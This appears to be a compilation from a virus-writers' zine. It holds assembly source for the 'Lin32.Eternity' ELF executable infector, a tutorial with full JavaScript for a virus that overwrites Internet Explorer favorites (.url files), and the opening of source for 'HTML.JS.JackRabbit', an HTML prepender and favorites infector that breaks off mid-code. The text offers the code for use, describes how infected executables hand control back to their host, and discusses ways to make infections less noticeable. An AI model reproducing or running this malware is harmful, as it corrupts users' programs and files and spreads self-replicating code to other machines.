control allowable accesses to a region of memory ; ; SYNOPSIS ; #include <sys/mman.h> ; ; int mprotect(const void *addr, size_t len, int prot); ;------------------------------------------------------------- lea ebx, [ebp-d3lta+main] ; const voi *addr and ebx, 0FFFFF000h ; Since I dont really know the correct size ; of the code segment I'll asume its 0x3000 ;) mov ecx, 0x3000 ; size_t len mov edx, 7 ; int prot PROT_READ|PROT_WRITE|PROT_EXEC mov eax,125 ; SYS.MPROTECT int 0x80 ; opening host file in O_RDONLY only modus pop ebx ; argv[0] xor ecx, ecx ; ecx = 0 = O_RDONLY mov eax,5 ; SYS.OPEN int 0x80 ; checking for returned file descriptor cmp eax,0xFFFFF000 ; Another implementation: ja Bye_Bye ; cmp eax,0x0 ; jl Bye_Bye call point ; a real interesting method to declare db '.',0 ; data and initialize registers with it point:pop esi ; esi = "." push eax ; save file descriptor of host ; on the stack call search_in_direc ; go search for it baby! pop ebx ; saved fd of host ;---++++++++++++++++++ EternityHost ++++++++++++++++++++++++++--- ;--- Desc : Move to end of file and copy the original code ; to the original entry point and execute it. ;--- INPUT : ebx (containing file descriptor of host file) ;--- OUTPUT : [none] ;---------------------------------------------------------------- EternityHost: ;------------------------------------------------------------- ; NAME ; lseek - reposition read/write file offset ; ; SYNOPSIS ; #include <sys/types.h> ; #include <unistd.h> ; ; off_t lseek(int fildes, off_t offset, int whence); ;------------------------------------------------------------- xor edx, edx ; edx = 0 = SEEK_SET db 0xb9 ; opcode for "mov ecx," seek_bytes: dd 00000000h ; sizeof(target_file) mov eax,19 ; SYS.LSEEK int 0x80 ; The return value of sys.lseek will be checked... ; If sys.lseek seeked successfully to that offset ; that means that this code is currently executed ; by an infected file... 
; If sys.lseek seeked unsuccessfully that means ; that this is the first execution of our virus... or eax, eax jnz restore_code ; execute original target code jmp Bye_Bye ; its the "dropper" --> exit ;---++++++++++++++++++++ restore_code ++++++++++++++++++++++++--- restore_code: ; Read "eternity_end-main" bytes from the end of the file ; and copy the data to [ebp-d3lta+main] ; Remember: Our code should be independent and that means ; that we're using only offsets. ;------------------------------------------------------------- ; NAME ; read - read from a file descriptor ; ; SYNOPSIS ; #include <unistd.h> ; ; ssize_t read(int fd,void *buf,size_t count); ;------------------------------------------------------------- lea ecx, [ebp-d3lta+main] ; void *buf push ecx pop esi mov edx, eternity_end-main ; size_t count mov eax,3 ; SYS.READ int 0x80 ; Close file descriptor... mov eax,6 ; SYS.CLOSE int 0x80 add esp,eternity_end-hostmain ; free stack mov dword [esp+32], esi ; its like an entrypoint popad ; restore registers ret ; return to host code ;---++++++++++++++++++++++++++ Bye_Bye ++++++++++++++++++++++++++--- Bye_Bye: mov eax,4 ; SYS.WRITE mov ebx,1 ; stdout lea ecx, [ebp-d3lta+Copyright] mov edx,dword [ebp-d3lta+copy_lenght] int 0x80 popad xor eax,eax inc eax int 0x80 ; SYS.EXIT ;################ END OF ETERNITYHOST ######################### ;---+++++++++++++++++++ search_in_direc +++++++++++++++++++++++--- ;--- DESC. : searches for files in esi (see below) ;--- INPUT : esi = name of directory where to search for files ;--- OUTPUT: [none] ;----------------------------------------------------------------- search_in_direc: mov ebx,esi ; directory name xor ecx,ecx ; ecx = 0 = O_RDONLY mov eax,0x5 int 0x80 ; SYS.OPEN cmp eax,0x0 jb near go_back ; Another implementation: ; or eax,eax ; jz go_back push eax ; push fd onto stack pop dword [ebp-d3lta+DirName] ; save fd to DirName ;---+++++++++++++++++++++ search4files ++++++++++++++++++++++++--- ;--- DESC. 
: loop label to search only regular files in esi ;--- INPUT : esi = name of file in the directory ;--- OUTPUT: [none] ;----------------------------------------------------------------- search4files: ;------------------------------------------------------------- ; NAME ; readdir - reads an directory entry ; ; SYNOPSIS ; #include <unistd.h> ; #include <linux/dirent.h> ; #include <linux/unistd.h> ; ; _syscall3(int, readdir, uint, fd, struct dirent *, dirp, uint, count); ; ; int readdir(unsigned int fd, struct dirent *dirp, unsigned int count); ;------------------------------------------------------------- lea ecx,[ebp-d3lta+DirentStruct] mov ebx,dword [ebp-d3lta+DirName] mov eax,89 int 0x80 ; SYS.READDIR or eax,eax ; Another implementation: jz go_back ; cmp eax,0x1 ; jne go_back add ecx,0xA ; file name in the DirentStruct mov esi,ecx ; save file name to esi ;------------------------------------------------------------- ; NAME ; lstat - list status of files ; ; SYNOPSIS ; #include <sys/types.h> ; #include <sys/stat.h> ; #include <unistd.h> ; ; int lstat(const char *file_name, struct stat *buf); ;------------------------------------------------------------- mov ebx,esi lea ecx,[ebp-d3lta+StatStruct] mov eax,107 int 0x80 ; SYS.LSTAT cmp eax,0x0 jb go_back movzx eax,word [ecx+0x8] ; get st_mode ; movzx will copy the 0 too mov ebx,eax ; Check if its a regular file.We dont want to infect ; directories ;) and ebx,0000F000h ; file mask cmp ebx,00008000h ; REG_FILE !? jnz next_entry ; Check if its user file and the most important ; thing: If it can be executed by the current user ;------------------------------------------------------------- ; Source: /usr/include/bits/stat.h ; ; #define __S_IEXEC 0100 /* Execute by owner. 
*/ ; --> 0100(octal) = 40(hex) ;------------------------------------------------------------- and eax,00000040h ; eax = st_mode or eax,eax ; Another implementation: jz next_entry ; cmp eax,00000040h ; jne next_entry found_file: call Inf3ct_Fil3 ; heheh...my favourite function ; Dont accuse me for beeing sarcastic ;) next_entry: jmp search4files go_back: ret ;################ END OF SEARCH_IN_DIREC ######################### ;---++++++++++++++++++++++ Inf3ct_Fil3 ++++++++++++++++++++++++--- ;--- DESC. : Fuck up ELF executables ;--- INPUT : esi = ELF file ;--- OUTPUT: [none] ;----------------------------------------------------------------- Inf3ct_Fil3: ; Open ELF file for read & write xor ecx,ecx mov ecx,2 ; O_RWONLY mov ebx,esi ; ELF file name mov eax,5 int 0x80 ; SYS.OPEN cmp eax,0 ; Another implementation: jl near Inf3ct_failed ; cmp eax,0xfffff000 ; ja Inf3ct_failed mov dword [ebp-d3lta+ELF_FD],eax ; save fd to ELF_FD ; Now we must find out file's size in order ; to mmap it later.Therefore we'll use lssek() xor ecx,ecx ; ecx = 0 = offset mov edx,2 ; SEEK_END mov ebx,eax ; file descriptor mov eax,19 int 0x80 ; SYS.SEEK mov dword [ebp-d3lta+seek_bytes],eax ; "update" seek_bytes with ; sizeof file ; Prepare for Mmap_Fil3 mov ebx,[ebp-d3lta+ELF_FD] xchg eax,ecx ; ecx = sizeof file call Mmap_Fil3 cmp eax,-1 ; Another implementation: je near Mmap_failed ; inc eax ; jz near Mmap_failed mov dword [ebp-d3lta+Mmap_Addr],eax mov esi,dword [ebp-d3lta+Mmap_Addr] ; CAUTION: Viral Sequence beginns here. ; : Infection Countdown started... 
;---+++++++++++++++++++++ check_if_ELF ++++++++++++++++++++++++--- check_if_ELF: ;------------------------------------------------------------- ; Source: hexdump -C elf_file | sed 1q ; ; 00000000 7f 45 4c 46 01 01 01 |.ELF...| ;------------------------------------------------------------- mov eax,dword [esi] cmp eax,0x464c457f ; hex for ".ELF" jne near Unmmap movzx eax,word [esi+40] ; EHDR size mov ebx,dword [esi+24] ; entry point movzx ecx,word [esi+44] ; ehdr.e_phnum movzx edx,word [esi+42] ; ehdr.e_phentsize mov edi,esi ; esi = edi = Mmap_Addr add edi,eax ; move to PHT( Program Header Table) ;------------------------------------------------------------- ; Source: readelf elf_file -l ; ; Program Headers: ; Type Offset VirtAddr PhysAddr FileSiz MemSiz Flg Align ; PHDR 0x000034 0x08048034 0x08048034 0x000e0 0x000e0 R E 0x4 ; INTERP 0x000114 0x08048114 0x08048114 0x00013 0x00013 R 0x1 ; [Requesting program interpreter: /lib/ld-linux.so.2] ; LOAD 0x000000 0x08048000 0x08048000 0x00484 0x00484 R E 0x1000 ; LOAD 0x000484 0x08049484 0x08049484 0x00100 0x00104 RW 0x1000 ; DYNAMIC 0x000498 0x08049498 0x08049498 0x000c8 0x000c8 RW 0x4 ; NOTE 0x000128 0x08048128 0x08048128 0x00020 0x00020 R 0x4 ; STACK 0x000000 0x00000000 0x00000000 0x00000 0x00000 RW 0x4 ;------------------------------------------------------------- ; As we can see only those LOAD segments could be potencially ; virus infection targets. Its a very intelligent implementation ; to check if the entry point is smaller than p_paddr + p_memsz ; since we want to insert our virus after the entry point ;) ; On UNIX platforms there are some exotic ELF file samples: a few of ; them have the data segment and the code segment in one segment: ; the code segment.Well only VXer do crazy things like this but ; but it was just an example... 
:P ; Now we'll search for the PHDR entry,where p_paddr + ; p_memsz > entry point get_phdr: mov eax,dword [edi+12] ; phdr.p_paddr add eax,dword [edi+20] ; p_memsz cmp ebx,eax ; if entry point is smaller ; than p_paddr + p_memsz then jump jl got_phdr add edi,edx ; move to next PHDR entry loop get_phdr jmp Unmmap ; if nothing found then exit ;---++++++++++++++++++++++++++ got_phdr ++++++++++++++++++++++++++--- got_phdr: mov esi,dword [esi+24] ; entry point ; Figure out offset to entry code by subtracting the ; PhsyAddr from the code segment from the entry point sub esi,dword [edi+8] ; edi+8 = PhysAddr mov ebx,esi add esi,dword [ebp-d3lta+Mmap_Addr] ; jump to entry point in the mmap ; file ; Check if our target file has been already infected ; by Linux.Eternity (c) by Cyneox ;)) mov eax,dword [ebp-d3lta+main] cmp dword [esi],eax jz near Unmmap ; already infected :( ; Check if there is enough place where to insert ; our viral code... mov eax,dword [edi+20] sub eax,ebx mov ecx,eternity_end-main cmp eax,ecx jb near Unmmap ; segment too small ; Creating a stack frame where to insert ; our host code... sub esp,eternity_end-main ; Write host code into that frame mov ebx,esi ; esi = source mov ecx,eternity_end-main mov edx,ecx ; lenght mov edi,esp ; destination rep movsb ; copy from esi to edi ; Write viral code at the entry point of ; mmaped file... ; First of all write until "start_virus"... xchg ebx,edi ; ebx=esp ; edi=esi ; Generate random number used as encryption key ; time() returns the time since the Epoch (00:00:00 UTC, ; January 1, 1970), measured in seconds. ; Those seconds represent a wonderfull randomly generated ; encryption key ... ;) mov eax,13 ; SYS.TIME mov ebx,dword [ebp-d3lta+Time] int 0x80 ; eax will contain a radomly generated number... and eax,0x9d2c and eax,0xefc6 mov dword [ebp-d3lta+encryption_key],eax ; update encryption key lea esi,[ebp-d3lta+main] mov ecx,start_virus-main rep movsb ; Write after "start_virus"... 
add edi,ecx ; update destination push edi lea esi,[ebp-d3lta+start_virus] mov ecx,eternity_end-start_virus rep movsb ;---+++++++++++++++++++++ Encryption ++++++++++++++++++++++++--- ; Using "Sliding Key Encryption" method... ; Its actually a "xor"-encryption while increasing the encryption key ; by 1. The cool thing about this method is following: ; ; Lets say we have this data : AABCC ; And our encryption key is : KBKBK ; ; In the first loop A will be encrypted with K , but in the second ; loop A will be encrypted with B. Thats a sory of polyalphabetical ; enciphering (pls visit my site to read something about that enciphering ; method). And that makes our encryption even more securer. ; If somebody looks at this encrypted code, they won't be able to tell that ; the two characters are the same when unencrypted. Encryption: pop edi mov esi,edi mov ecx,(eternity_end-start_virus)/4 mov ebx,dword [ebp-d3lta+encryption_key] cld loop_encrypt: lodsd ; load dword from [esi] to [eax] xor eax,ebx ; encryption inc ebx ; increase ebx stosd ; store dword from [eax] to [edi]=[esi] loop loop_encrypt ; loop until ECX>0 lea esi,[ebp-d3lta+main] ; Now we'll unmmap our target and write the original ; host code at the end of the file... mov ecx,dword [ebp-d3lta+seek_bytes] ; sizeof file mov ebx,dword [ebp-d3lta+Mmap_Addr] mov eax,91 ; SYS.UNMMAP int 0x80 ;------------------------------------------------------------- ; Source: ls -l ./gcc ; -rwxr-xr-x 1 cyneox users 98665 2005-03-20 17:09 gcc ; ; Size of target before virus infection... ;------------------------------------------------------------- ; Write host code at EOF mov ecx,esp mov edx,eternity_end-main mov ebx,dword [ebp-d3lta+ELF_FD] ; file descriptor mov eax,0x4 ; SYS.WRITE int 0x80 ;------------------------------------------------------------- ; Source: ls -l ./gcc ; -rwxr-xr-x 1 cyneox users 100178 2005-03-20 17:11 gcc ; ; Size of target AFTER virus infection ... 
;------------------------------------------------------------- add esp,eternity_end-main ; restore frame ; This is a "copyright" function to ; append my message. sub esp,dword [ebp-d3lta+Appendix_lenght] mov edi,esp ; direction lea esi,[ebp-d3lta+Appendix] mov ecx,dword [ebp-d3lta+Appendix_lenght] mov edx,ecx rep movsb mov edx,ebx mov eax,4 ; SYS.WRITE mov ebx,edx ; write to file descriptor mov ecx,esp ; write from stack mov edx,dword [ebp-d3lta+Appendix_lenght] int 0x80 add esp,dword [ebp-d3lta+Appendix_lenght] ; restore stack jmp Mmap_failed ;---++++++++++++++++++++++++++ Unmmap ++++++++++++++++++++++++++--- Unmmap: mov ecx,dword [ebp-d3lta+seek_bytes] ; size mov ebx,dword [ebp-d3lta+Mmap_Addr] ; mmap addr mov eax,91 int 0x80 ; SYS.UNMMAP Mmap_failed: mov ebx,dword [ebp-d3lta+ELF_FD] mov eax,6 int 0x80 ; SYS.CLOSE Inf3ct_failed: ret ;################# END OF INF3CT_FIL3 ############################ ;---++++++++++++++++++++++ Mm@p_Fil3 ++++++++++++++++++++++++++--- ;--- DESC. : Map file in the memory ;--- INPUT : ebx = file descriptor ; : ecx = size ;--- OUTPUT: eax = addr of memory map ;----------------------------------------------------------------- Mmap_Fil3: ;------------------------------------------------------------- ; NAME ; mmap - save data into memory ; ; SYNOPSIS ; #include <unistd.h> ; #include <sys/mman.h> ; ; void * mmap(void *start, size_t length, int prot , int flags, int fd, ; off_t offset); ;------------------------------------------------------------- lea esi,[ebp-d3lta+MmapStruct] mov dword [esi+4],ecx ; sizeof file mov dword [esi+16],ebx ; file descriptor xchg ebx,esi mov eax,90 int 0x80 ; SYS.MMAP ; Another implemenatation; ; mov eax,90 ; mov edx,ebx ; sub esp,24 ; mov dword [esp],0x0 ; mov dword [esp+4],ecx ; mov dword [esp+8],3 ; mov dword [esp+12],1 ; mov dword [esp+16],edx ; mov dword [esp+20],0 ; mov ebx,esp ; int 0x80 ; add esp,24 ret ;---++++++++++++++++++++++++++ __exit ++++++++++++++++++++++++++--- __exit: xor eax,eax ; eax = 0 inc 
eax ; eax = 1 int 0x80 ; SYS.EXIT ;---+++++++++++++++++++++++ host_end ++++++++++++++++++++++++++--- host_end: ;---++++++++++++++++++++++++ handler +++++++++++++++++++++++++--- handler: push ebp mov esp,ebp ; simply do nothing while program ; receives signal SIGTRAP pop ebp ret DirName dd 00000000h ; directory name ELF_FD dd 00000000h ; ELF file descriptor Mmap_Addr dd 00000000h ; MMAP address Time dd 00000000h ; variable used by syscall time() Copyright: db ":::.Lin32.Eternity by Cyneox/rRlf.:::",0xa,0x0 msg: db "Te iubesc, te doresc, mai mult ca viata mea...",0xa,0x0 db "Numai tu si Dumnezeu sunteti inima mea.",0xa,0xa,0x0 db "Caline, my eternal love just for you!",0xa,0x0 db "by Cyneox/rRlf [24.03.2005]",0xa,0x0 copy_lenght dd $-Copyright Appendix: db "Lin32.Eternity by Cyneox/rRlf/Helith [March 2005]",0xa,0x0 Appendix_lenght dd $-Appendix copyright_end: ;----------------------------------------------------------------- ; Source: /usr/include/asm/stat.h ; struct stat { ; unsigned short st_dev; ; unsigned short __pad1; ; unsigned long st_ino; ; unsigned short st_mode; ; unsigned short st_nlink; ; unsigned short st_uid; ; unsigned short st_gid; ; unsigned short st_rdev; ; unsigned short __pad2; ; unsigned long st_size; ; unsigned long st_blksize; ; unsigned long st_blocks; ; unsigned long st_atime; ; unsigned long __unused1; ; unsigned long st_mtime; ; unsigned long __unused2; ; unsigned long st_ctime; ; unsigned long __unused3; ; unsigned long __unused4; ; unsigned long __unused5; ;}; ;-------------------------------------------------------------- StatStruct: dw 0000h ; st_dev dw 0000h ; __pad1 dd 00000000h ; st_ino dw 0000h ; st_mode dw 0000h ; st_nlink dw 0000h ; st_uid dw 0000h ; st_gid dw 0000h ; st_rdev dw 0000h ; __pad2 dd 00000000h ; st_size dd 00000000h ; st_blksize dd 00000000h ; st_blocks dd 00000000h ; st_atime dd 00000000h ; __unused1 dd 00000000h ; st_mtime dd 00000000h ; __unused2 dd 00000000h ; st_ctime dd 00000000h ; __unused3 dd 00000000h ; 
__unused4 dd 00000000h ; __unused5 ;-------------------------------------------------------------- ; Source: /usr/include/bits/dirent.h ; struct dirent ; { ;#ifndef __USE_FILE_OFFSET64 ; __ino_t d_ino; ; __off_t d_off; ;#else ; __ino64_t d_ino; ; __off64_t d_off; ;#endif ; unsigned short int d_reclen; ; unsigned char d_type; ; char d_name[256]; /* We must not include limits.h! */ ; }; ;-------------------------------------------------------------- DirentStruct: dd 00000000h ; d_ino dd 00000000h ; d_off dw 0000h ; d_reclen times 256 db 00h ; d_name[256] MmapStruct: dd 00000000h ; addr dd 00000000h ; lenght dd 00000003h ; prot: PROT_WRITE|PROT_READ dd 00000001h ; flags: MAP_PRIVATE dd 00000000h ; file descriptor(fd) dd 00000000h ; offset testing times 11 db 00h eternity_end:
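The "Sliding Key Encryption" comment in the listing above describes XORing each dword of the body with a key that grows by one per dword, after the key has been taken from time() and passed through two `and` masks. The Python below is an added analyst's example, not part of the original source; the function names and the sample buffer are constructed here. It reproduces the transform and shows that either one known plaintext dword or a search over the keys the masks permit is enough to decode a body protected this way.

```python
import struct

MASK32 = 0xFFFFFFFF
# The two AND masks the listing applies to the time() result before use.
KEY_MASKS = (0x9D2C, 0xEFC6)


def sliding_xor(data, key):
    """XOR little-endian dword i with (key + i) mod 2**32.

    XOR is its own inverse, so this both encodes and decodes. Trailing bytes
    that do not fill a dword are copied unchanged, because the listing only
    processes length // 4 dwords.
    """
    count = len(data) // 4
    words = struct.unpack("<%dI" % count, data[:count * 4])
    mixed = [w ^ ((key + i) & MASK32) for i, w in enumerate(words)]
    return struct.pack("<%dI" % count, *mixed) + data[count * 4:]


def candidate_keys(masks=KEY_MASKS):
    """Return (combined_mask, sorted list of every key the masks can yield)."""
    combined = MASK32
    for mask in masks:
        combined &= mask
    bits = [b for b in range(32) if (combined >> b) & 1]
    keys = []
    for combo in range(1 << len(bits)):
        keys.append(sum(1 << b for j, b in enumerate(bits) if (combo >> j) & 1))
    return combined, sorted(keys)


def key_from_known_dword(cipher, plain_dword, index=0):
    """Recover the starting key from one known plaintext dword at `index`."""
    (c,) = struct.unpack_from("<I", cipher, index * 4)
    (p,) = struct.unpack("<I", plain_dword)
    return ((c ^ p) - index) & MASK32


def brute_force(cipher, marker):
    """Decode under every permitted key; keep the keys that reveal `marker`."""
    _, keys = candidate_keys()
    return [k for k in keys if marker in sliding_xor(cipher, k)]


# Constructed sample: filler bytes plus a marker string, NOT real code.
SAMPLE_PLAIN = b"\x90" * 16 + b"constructed-marker" + bytes(range(64))
SAMPLE_TIME = 1111337849                      # constructed time() value
SAMPLE_KEY = SAMPLE_TIME & KEY_MASKS[0] & KEY_MASKS[1]
SAMPLE_CIPHER = sliding_xor(SAMPLE_PLAIN, SAMPLE_KEY)

if __name__ == "__main__":
    combined, keys = candidate_keys()
    print("effective mask: %#06x, %d possible keys" % (combined, len(keys)))
    print("known-plaintext key: %#x"
          % key_from_known_dword(SAMPLE_CIPHER, SAMPLE_PLAIN[:4]))
    print("brute-force hits:",
          [hex(k) for k in brute_force(SAMPLE_CIPHER, b"constructed-marker")])
```

The two masks combine to 0x8d04, which has five bits set, so only 32 starting keys are possible regardless of the clock value.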

articles

Your favorites, my victims - .url infection in JavaScript
---------------------------------------------------------
by DiA (c)04 GermanY
www.vx-dia.de.vu
DiA_hates_machine@gmx.de
____________________________________________________________________________________________

Do with this code what you want. I am not responsible for things you do. If you write
new code, or rewrite this, YOU and only YOU are responsible for this code. Take care!

 __________________________
| 1. Intro                 |
| 2. URL file format       |
| 3. Code with description |
| 4. Idea's and Goal's     |
| 5. Outro                 |
|__________________________|


1. Intro
--------
Everybody has favorite sites on the i-net. But they can't remember all the URLs, so they add
every site they use to the "favorites". You can find them in IE under the menu "favorites"
(what else?!). But you will only see the page's title, like "VX Heavens" or "vx - DiA" ;).
But where are the links to these sites? They are stored as *.url files in the "favorites"
folder in Windows, like "C:\Windows\Favorites\". In this tut we want to overwrite these *.url
files with a .url file linked to our Virus. Let's do this...

...have fun!


2. URL file format
------------------
[InternetShortcut]                  - hey windows, it's an InternetShortcut!
URL=http://www.vx-dia.de.vu/        - the linked site, our virus will be in location
                                      "file:///C:\Windows\4551.htm"
WorkingDirectory=C:\WINDOWS\        - not interesting for this tut
ShowCommand=7                       - not interesting for this tut
IconIndex=1                         - not interesting for this tut
IconFile=C:\WINDOWS\SYSTEM\url.dll  - not interesting for this tut
Modified=20F06BA06D07BD014D         - not interesting for this tut
HotKey=1601                         - not interesting for this tut


3.
Code with description ------------------------ First without description: <html> <head> <script language="JavaScript"> ThisFile = location.href; if (ThisFile.indexOf("file:///") != -1) { wshell = new ActiveXObject("WScript.Shell"); fso = new ActiveXObject("Scripting.FileSystemObject") FavFolder = wshell.SpecialFolders("Favorites") + "\\"; WinFolder = fso.GetSpecialFolder(0) + "\\"; ThisFile = location.href.substr(8); Virus = fso.GetFile(ThisFile); Virus.Copy(WinFolder + "4551.htm"); fso.CreateTextFile(WinFolder + "4551.url"); URLFile = fso.OpenTextFile(WinFolder + "4551.url",2,false,0); URLFile.WriteLine("[InternetShortcut]"); URLFile.WriteLine("URL=file:///" + WinFolder + "4551.htm"); URLFile.Close(); FakeURL = fso.GetFile(WinFolder + "4551.url"); Favorit = fso.GetFolder(FavFolder); FindFile = new Enumerator(Favorit.Files); FindFile.moveFirst(); while (FindFile.atEnd() == false) { Victim = FindFile.item(); URLType = new String(Victim); len = URLType.length; if (URLType.indexOf("url",len-3) != -1) { FakeURL.Copy(Victim); } FindFile.moveNext(); } } else { alert("HTML.JS.4551 - Virus\n\nOnly a *.url infection sample!\n\n\n\Only works's under loacation file:///\n\n\n\n\nby DiA (c)04 - www.vx-dia.de.vu"); } </script> </head> <body link="#000000" alink="#000000" vlink="#000000"> <div align="center"> <h1>HTML.JS.4551 - *.url infection sample</h1><br><br> by DiA (c)04 GermanY<br> <a href="http://www.vx-dia.de.vu">www.vx-dia.de.vu</a><br> <a href="mailto:DiA_hates_machine@gmx.de">DiA_hates_machine@gmx.de</a></div> </body> </html> And now with description for better understanding, but ugly lookin ;) : <html> <head> <script language="JavaScript"> // we do it in JavaScript ThisFile = location.href; //looks like "file:///C:\Tests\4551.htm" if (ThisFile.indexOf("file:///") != -1) { // only run virus if location is "file:///" and not "http://" wshell = new ActiveXObject("WScript.Shell"); fso = new ActiveXObject("Scripting.FileSystemObject") // create wshell to read the 
"Favorites" path // create fso to handle files FavFolder = wshell.SpecialFolders("Favorites") + "\\"; WinFolder = fso.GetSpecialFolder(0) + "\\"; // save "Favorites" path to infect .url files // save "Windows" path to copy virus, and drop Fake .url file ThisFile = location.href.substr(8); Virus = fso.GetFile(ThisFile); // remove "file:///" to handle with the path // get virus file, to copy it Virus.Copy(WinFolder + "4551.htm"); // copy virus to Windows\4551.htm, like "C:\Windows\4551.htm" fso.CreateTextFile(WinFolder + "4551.url"); URLFile = fso.OpenTextFile(WinFolder + "4551.url",2,false,0); URLFile.WriteLine("[InternetShortcut]"); URLFile.WriteLine("URL=file:///" + WinFolder + "4551.htm"); URLFile.Close(); FakeURL = fso.GetFile(WinFolder + "4551.url"); // create FakeURL file, every time // write the path to the virus in this .url // now 4551.url looks like: // [InternetShortcut] // URL=file:///C:\Windows\4551.htm // if you execute this 4551.url, you will see the virus again ;) Favorit = fso.GetFolder(FavFolder); FindFile = new Enumerator(Favorit.Files); FindFile.moveFirst(); // get favorite folder to handle with it // create a new enumerator to find all (!) 
files in this directory // find first file while (FindFile.atEnd() == false) { // do a while(), to find all files in one directory // if no more files -> exit while() Victim = FindFile.item(); // save path of victim, like "C:\Windows\Favorites\GMX.url" URLType = new String(Victim); len = URLType.length; // create a new string object of the victim path, to handle with // get lenght of the path, to check extensions of files if (URLType.indexOf("url",len-3) != -1) { // infect only if last 3 char's contains "url" FakeURL.Copy(Victim); // overwrite victim with dropped FakeURL file } FindFile.moveNext(); // Find next file in "favorites" folder } } // end if else { alert("HTML.JS.4551 - Virus\n\nOnly a *.url infection sample!\n\n\n\Only works's under loacation file:///\n\n\n\n\nby DiA (c)04 - www.vx-dia.de.vu"); } // if we are on another location (like ftp:// or http://) show only a message, and DON'T run // virus file </script> </head> <body link="#000000" alink="#000000" vlink="#000000"> <div align="center"> <h1>HTML.JS.4551 - *.url infection sample</h1><br><br> by DiA (c)04 GermanY<br> <a href="http://www.vx-dia.de.vu">www.vx-dia.de.vu</a><br> <a href="mailto:DiA_hates_machine@gmx.de">DiA_hates_machine@gmx.de</a></div> </body> </html> 4. Idea's and Goal's -------------------- The user will check that somethin is wrong, when no favorite work's anymore! So we must find a way to infect .url's, but load the site that should be load! So, we must read first the real URL before overwrite the .url. Maybe we found the file "vx - DiA.url": 1. Read real URL from this file 2. store it in another file, like "vx - DiA.txt" 3. overwrite this file with FakeURL file When the "vx - DiA.url" are executed, the virus will do the work: 1. Infect files 2. read real URL from "vx - DiA.txt" 3. 
load this site

I am workin on this method, but the problem is that not every .url looks the same, like:

[InternetShortcut]
URL=http://www.vx-dia.de.vu

Some look like:

[DEFAULT]
BASEURL=http://www.f-prot.de/down/tools-f.php
[InternetShortcut]
URL=http://www.f-prot.de/down/tools-f.php
IconFile=http://www.f-prot.de/favicon.ico
IconIndex=1

Another problem is that most .url files have their own icon, so we must read the icon
location and write this location in our FakeURL file, so that it looks like:

[InternetShortcut]
URL=file:///C:\Windows\4551.htm
IconFile=http://www.f-prot.de/favicon.ico
IconIndex=1

I am working on these problems, and writing a HTML.JS Virus:
 - .html infection -> prepender
 - .url infection -> load real site
 - don't change icon, or something, only change URL=...
 - and other features...


5. Outro
--------
I hope you enjoyed this little tutorial. If you have any comments, send me a mail to
DiA_hates_machine@gmx.de ! That's all at this time, now I go on with the problems =)

Have fun... Code on... bye,
DiA [06.05.04 - GermanY]

sources

 _____________________________________________
|             HTML.JS.JackRabbit              |
|         by DiA[rRlf] (c)04 GermanY          |
| www.vx-dia.de.vu - DiA_hates_machine@gmx.de |
|_____________________________________________|


:Disclaimer
-----------
I am not responsible for what you do! You can use the code however you want.
You (and only you) are responsible at this time...


:Intro
------
This is the very first non overwriting .url (favorites) infector. URL infection means that
the Virus infects InternetShortcuts! It only infects the InternetShortcuts in the
"Favorites" folder. OK, for newbies or idiots: the Virus infects the Favorites, in IE under
the menu "Favorites"! If you load a favorite, the Virus does its work. But the kewl thing is
that the Virus loads the real favorite after its work =) The idea came to my mind in school,
and after one week I finished that nice Virus. I am proud that it works ;) Have fun with this
little thing, and take care!


:Features
---------
 - .htm and .html prepender, only infects files in the current directory if the current
   directory IS NOT the favorites directory
 - infects all .url (InternetShortcuts) in the "Favorites" folder
 - if the IconShortcut has an icon, the Virus keeps it
 - after infection, the Virus loads the real URL
 - Payload on day 13 of every month (MsgBox, and load www.vx-dia.de.vu)


:How does the .url infection work
---------------------------------
OK, this situation: The Virus finds a not infected victim "vx - DiA.url". Not infected, it
looks like this:

---vx - DiA.url---------------------------------
[InternetShortcut]
URL=http://www.vx-dia.de.vu/
IconFile=http://vx.helith.net/~DiA/icon.ico
IconIndex=1
---vx - DiA.url---------------------------------

Now the Virus reads out the real URL (URL=http://www.vx-dia.de.vu), and stores this string in
a file called "vx - DiA.DiA":

---vx - DiA.DiA---------------------------------
http://www.vx-dia.de.vu
---vx - DiA.DiA---------------------------------

A Virus Copy drops under the
name "vx - DiA.htm". If the InternetShortcut has a Icon, the Virus read this information from the Victim. Then the Virus overwrites the victim .url with a fake .url: ---vx - DiA.url--------------------------------- [InternetShortcut] URL=file:///C:\Windows\Favorites\vx - DiA.htm IconFile=http://vx.helith.net/~DiA/icon.ico IconIndex=1 ---vx - DiA.url--------------------------------- :What happen's if I would load "vx - DiA" favorite -------------------------------------------------- The Virus does first it's work. Infect all files in "Favorites" folder... Then the Virus read the real URL from the stored file, called "vx - DiA.DiA" (http://www.vx-dia.de.vu) and load this site via "location = RealURL". And that's all, real favorite is loaded in the browser, and the User think's all is allright ;) :Outro ------ OK, that's all about non overwriting .url infection, have fun with this code! For thanks scroll to the bottom ;) Have a nice Day... 17.05.04 - DiA[rRlf] <html><JackRabbit> <head> <script language="JavaScript"> ThisFile = location.href; if (ThisFile.indexOf("file:///") != -1) { wshell = new ActiveXObject("WScript.Shell"); fso = new ActiveXObject("Scripting.FileSystemObject"); FavFolder = wshell.SpecialFolders("Favorites") + "\\"; ThisFile = location.href.substr(8); VirusName = new String(ThisFile); Virus = VirusName.replace("%20"," "); for (i = 0; i < 20; i++) { Virus = Virus.replace("%20"," "); } Virus = fso.GetFile(Virus); VirPath = Virus.ParentFolder + "\\"; if (VirPath != FavFolder) { ReadVirCode = fso.OpenTextFile(Virus,1,false,0); VirCode = ReadVirCode.Read(4912); InfFolder = fso.GetFolder(VirPath); FindFile = new Enumerator(InfFolder.Files); FindFile.moveFirst(); while (FindFile.atEnd() == false) { Victim = FindFile.item(); FileType = fso.GetFile(Victim); if (Victim != Virus) { if (FileType.Type.indexOf("HTML") != -1) { CheckMarker = fso.OpenTextFile(Victim,1,false,0); Marker = CheckMarker.ReadLine(); if (Marker.indexOf("<JackRabbit>") == -1) { ReadVicCode 
